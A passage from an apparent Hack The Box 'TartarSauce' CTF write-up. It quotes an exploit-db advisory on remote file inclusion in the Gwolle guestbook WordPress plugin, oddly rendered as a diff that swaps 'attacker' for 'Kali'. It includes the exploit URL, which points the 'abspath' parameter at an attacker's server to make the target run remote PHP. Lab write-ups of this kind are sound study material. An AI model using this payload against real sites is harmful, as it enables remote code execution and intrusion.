snovvcrash/snovvcrash.github.io/_posts/2018-11-02-htb-tartarsauce-write-up.md

      Path: /usr/share/exploitdb/exploits/php/webapps/38861.txt

 ...
 HTTP GET parameter "abspath" is not being properly sanitized before being used in PHP require() function.
-A remote attacker can include a file named 'wp-load.php' from arbitrary remote server and execute its content on the vulnerable web server.
-In order to do so the attacker needs to place a malicious 'wp-load.php' file into his server document root and includes server's URL into request:
+A remote Kali can include a file named 'wp-load.php' from arbitrary remote server and execute its content on the vulnerable web server.
+In order to do so the Kali needs to place a malicious 'wp-load.php' file into his server document root and includes server's URL into request:

 http://[host]/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://[hackers_website]
 ...